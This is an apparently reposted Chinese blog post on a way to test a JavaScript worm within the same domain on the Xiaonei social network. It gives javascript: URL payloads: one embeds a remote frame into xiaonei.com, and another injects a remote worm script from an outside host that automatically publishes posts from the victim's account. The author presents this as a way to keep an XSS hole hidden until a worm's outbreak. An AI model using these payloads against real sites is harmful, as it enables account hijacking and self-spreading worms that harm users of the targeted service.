zoukankan      html  css  js  c++  java
  • 同域内测试蠕虫的一种方法

    汗……本来在讨论这个的http://www.gnucitizen.org/blog/ghost-busters/,有意思:

    <a href="javascript:x=open('http://www.xiaonei.com/');setInterval (function(){try{x.frames[0].location={toString:function(){return%20'http://127.0.0.1/myframe.html';}}}catch(e){}},3000);void(1);">Sample PoC Here.</a>

    打 开代码中javascript链接时,远程的myframe.html会被嵌入到www.xiaonei.com上。详细的见上面这个网址。很快我就想是 否能同理于<iframe>将<script>里的src替代为我的远程js呢?不行……上面代码x代表一个window对 象,iframe内嵌框架的父级对象就是window,而script标签的父级对象是document。当open一个新窗口时,我们仅能获取这个 window对象。其他的怎么回事。我迷糊了。回归主题:同域内测试蠕虫的一种方法。

    我这拿校内网做实验,在浏览器地址栏直接输入(你可以试试下面这段代码,执行后会自动帮你发一篇新文章):

    javascript:x=open('http://home.xiaonei.com/Home.do');setTimeout("document.scripts[0].src='http://www.0x37.com/Project/gworm.js'",3000);void(1);

    这样gworm.js就可以为所欲为了(依赖于你的校内网帐户权限),代码的执行效率可比手动高得多:)。以后就没必要每次测试蠕虫时就利用一次XSS,这样可以防止XSS Trap在没爆发之前暴露:)

    from:http://www.0x37.com/post/15.html
  • 相关阅读:
    Javascript 进阶
    transform顺序浅谈
    js对象克隆
    js动画最佳实现——requestAnimationFrame
    svg标签
    typeof和instanceof
    js变量浅谈
    X-UA-compatible浅谈
    封装$
    面向对象
  • 原文地址:https://www.cnblogs.com/top5/p/1605160.html
Copyright © 2011-2022 走看看